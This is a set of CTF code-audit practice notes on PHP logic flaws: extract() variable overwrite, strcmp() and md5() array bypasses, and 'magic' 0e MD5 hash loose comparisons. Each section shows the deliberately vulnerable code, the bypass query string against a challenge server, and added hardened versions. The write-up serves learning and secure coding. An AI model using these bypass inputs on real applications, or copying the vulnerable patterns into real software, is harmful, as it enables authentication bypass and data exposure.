Idle CTF practice notes

BugKuCTF code audit

extract() variable overwrite

http://120.24.86.145:9009/1.php

<?php
$flag = 'xxx';
extract($_GET);
if (isset($shiyan)) {
    $content = trim(file_get_contents($flag));
    if ($shiyan == $content) {
        echo 'flag{xxx}';
    } else {
        echo 'Oh.no';
    }
}
?>

The extract() function overwrites existing variables when its flag is EXTR_OVERWRITE or when no flag is given at all. Make the request so that $shiyan and $content are both empty, with $flag pointing at a meaningless file name:

http://120.24.86.145:9009/1.php?flag=1&shiyan=

flag{bugku-dmsj-p2sm3N}
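To show the overwrite next to a form that does not have it, here is an added example; it is not the challenge's own code. The function names, the assumed flag path 'flag.txt' and the simulated request array are mine. The vulnerable function reproduces the check above (a bogus path makes file_get_contents() return false, which becomes "" after the cast, and "" == "" holds); the hardened one reads only the parameter it expects and treats an unreadable file as a failure rather than as an empty string.

```php
<?php
// Added example (not the BugKu challenge code): extract() variable overwrite next to a
// version that never lets request data choose variable names. $_GET is simulated so
// the script runs from the CLI: php extract_demo.php

function vulnerable(array $get): string {
    $flag = 'flag.txt';                        // meant to be the path of the flag file (assumed)
    extract($get);                             // default EXTR_OVERWRITE: ?flag=... replaces $flag
    if (isset($shiyan)) {
        // A bogus path makes file_get_contents() return false, which the cast turns
        // into "", and "" == "" is true, so an empty ?shiyan= matches.
        $content = trim((string) @file_get_contents($flag));
        return ($shiyan == $content) ? 'flag{xxx}' : 'Oh.no';
    }
    return 'no input';
}

function hardened(array $get): string {
    $flag = 'flag.txt';
    // Read exactly the parameter you expect. extract($get, EXTR_SKIP) would also leave
    // $flag alone, but an explicit assignment is easier to audit.
    $shiyan = $get['shiyan'] ?? null;
    if (!is_string($shiyan) || $shiyan === '') {
        return 'no input';
    }
    $content = @file_get_contents($flag);
    if ($content === false) {
        return 'Oh.no';                        // an unreadable file is a failure, not a match
    }
    return hash_equals(trim($content), $shiyan) ? 'flag{xxx}' : 'Oh.no';
}

// Constructed request equal to the writeup's query string: ?flag=1&shiyan=
$request = ['flag' => '1', 'shiyan' => ''];
echo 'vulnerable: ' . vulnerable($request) . PHP_EOL;
echo 'hardened:   ' . hardened($request) . PHP_EOL;
```

Run it with the PHP CLI; the first line reports the flag even though no flag file exists, the second does not. The review point for an audit is the same either way: any extract() over request data (or a register_globals-style loop) deserves a finding unless the flag is EXTR_SKIP and the surrounding variables were initialised before the call.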

strcmp string comparison

http://120.24.86.145:9009/6.php

<?php
$flag = "flag{xxxxx}";
if (isset($_GET['a'])) {
    if (strcmp($_GET['a'], $flag) == 0) // returns < 0 if str1 is less than str2;
                                        // returns > 0 if str1 is greater than str2;
                                        // returns 0 if the two are equal.
                                        // Compares two strings (case-sensitive).
        die('Flag: '.$flag);
    else
        print 'No';
}
?>

When strcmp() is asked to compare an array with a string the result is 0, so pass a[] as an array:

http://120.24.86.145:9009/6.php?a[]=1

The md5() function

http://120.24.86.145:9009/18.php

<?php
error_reporting(0);
$flag = 'flag{test}';
if (isset($_GET['username']) and isset($_GET['password'])) {
    if ($_GET['username'] == $_GET['password'])
        print 'Your password can not be your username.';
    else if (md5($_GET['username']) === md5($_GET['password']))
        die('Flag: '.$flag);
} else {
    print 'Invalid password';
}
?>

md5() cannot handle an array and returns NULL for it, so pass username[] and password[]:

http://120.24.86.145:9009/18.php?username[]=1&password[]=2
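The strcmp() trick above and this md5() trick share one root cause: an internal string function handed an array. On PHP 5 and 7 the call emits a warning and returns NULL, so NULL == 0 passes the strcmp check and NULL === NULL passes the md5 check; PHP 8 throws a TypeError for the same input instead. The following added example, which is not part of either challenge, puts both checks beside the version that rejects non-string input before comparing. Function names and the simulated inputs are mine; the try/catch exists only so the script runs on any PHP version, and md5 is kept solely to mirror the challenge (real credentials belong behind password_hash()).

```php
<?php
// Added example, not part of the BugKu challenges: the two "array instead of string"
// bypasses (strcmp and md5) side by side with the input checks that close them.
// Inputs are simulated in place of $_GET so the script runs from the CLI.

$flag = 'flag{xxxxx}';

// Challenge 6 pattern: strcmp() fed an array.
function strcmpVulnerable($a, string $flag): string {
    try {
        // PHP 5/7: strcmp(array, string) warns, returns NULL, and NULL == 0 is true.
        // PHP 8: the same call throws TypeError; caught here only so the demo runs everywhere.
        return (@strcmp($a, $flag) == 0) ? 'Flag: ' . $flag : 'No';
    } catch (TypeError $e) {
        return 'TypeError (PHP 8 refuses the array)';
    }
}

function strcmpHardened($a, string $flag): string {
    if (!is_string($a)) {          // reject anything that is not a plain string
        return 'No';
    }
    return hash_equals($flag, $a) ? 'Flag: ' . $flag : 'No';   // strict and constant-time
}

// Challenge 18 pattern: md5() fed arrays, so both sides become NULL and NULL === NULL holds.
function md5Vulnerable($user, $pass, string $flag): string {
    try {
        if ($user == $pass) {
            return 'Your password can not be your username.';
        }
        return (@md5($user) === @md5($pass)) ? 'Flag: ' . $flag : 'Invalid password';
    } catch (TypeError $e) {
        return 'TypeError (PHP 8 refuses the array)';
    }
}

function md5Hardened($user, $pass, string $flag): string {
    if (!is_string($user) || !is_string($pass)) {   // arrays never reach the hash call
        return 'Invalid password';
    }
    if ($user === $pass) {
        return 'Your password can not be your username.';
    }
    return hash_equals(md5($user), md5($pass)) ? 'Flag: ' . $flag : 'Invalid password';
}

// Constructed inputs equal to the writeup's query strings: ?a[]=1 and ?username[]=1&password[]=2
echo 'strcmp vulnerable: ' . strcmpVulnerable(['1'], $flag) . PHP_EOL;
echo 'strcmp hardened:   ' . strcmpHardened(['1'], $flag) . PHP_EOL;
echo 'md5 vulnerable:    ' . md5Vulnerable(['1'], ['2'], $flag) . PHP_EOL;
echo 'md5 hardened:      ' . md5Hardened(['1'], ['2'], $flag) . PHP_EOL;
```

The is_string() guard is the fix to look for in a review: once request values are forced to be strings, strcmp() and md5() behave as their documentation describes, and hash_equals() removes the loose == on top of it.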

md5 hash equality bypass

http://120.24.86.145:9009/13.php

<?php
$md51 = md5('QNKCDZO');
$a = @$_GET['a'];
$md52 = @md5($a);
if (isset($a)) {
    if ($a != 'QNKCDZO' && $md51 == $md52) {
        echo "flag{*}";
    } else {
        echo "false!!!";
    }
} else {
    echo "please input a";
}
?>

QNKCDZO 240610708 s878926199a s155964671a s214587387a

Because the hash strings are compared with "!=" or "==", PHP treats every hash that begins with "0E" as the number 0, so construct:

http://120.24.86.145:9009/13.php?a=s155964671a
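Why the five strings listed above all work: an MD5 digest of the form 0e followed only by digits is a numeric string in PHP, and two numeric strings under == are compared as numbers, so any two such digests are "equal" even though their bytes differ. The added example below is mine, not the challenge's; it checks each listed string for that digest shape and runs the challenge's loose comparison beside a strict one. The helper names are assumptions.

```php
<?php
// Added example, not from the challenge: "0e..." MD5 digests and why == treats them as equal.
// The five input strings are the ones listed in the writeup.

$magic = ['QNKCDZO', '240610708', 's878926199a', 's155964671a', 's214587387a'];

// True when md5($s) is "0e" followed only by digits: PHP parses such a string as the
// float 0e<digits> == 0, so every digest of this shape compares == to every other one.
function isMagicMd5(string $s): bool {
    return preg_match('/^0e\d+$/', md5($s)) === 1;
}

// The challenge's check: loose comparison of two hex digests.
function looseCompare(string $a, string $b): bool {
    return md5($a) == md5($b);
}

// The fix: compare the digests byte for byte. hash_equals() is also constant-time;
// a plain === would close this particular hole as well.
function strictCompare(string $a, string $b): bool {
    return hash_equals(md5($a), md5($b));
}

foreach ($magic as $s) {
    printf("%-12s md5=%s magic=%s\n", $s, md5($s), isMagicMd5($s) ? 'yes' : 'no');
}
printf("loose:  %s\n", looseCompare('QNKCDZO', 's155964671a') ? 'equal' : 'different');
printf("strict: %s\n", strictCompare('QNKCDZO', 's155964671a') ? 'equal' : 'different');
```

In an audit, every == or != between a digest and another string is the finding; the $a != 'QNKCDZO' guard in the challenge is loose as well, but the input that bypasses it is a different string anyway, so only the digest comparison needs to be strict for the check to hold.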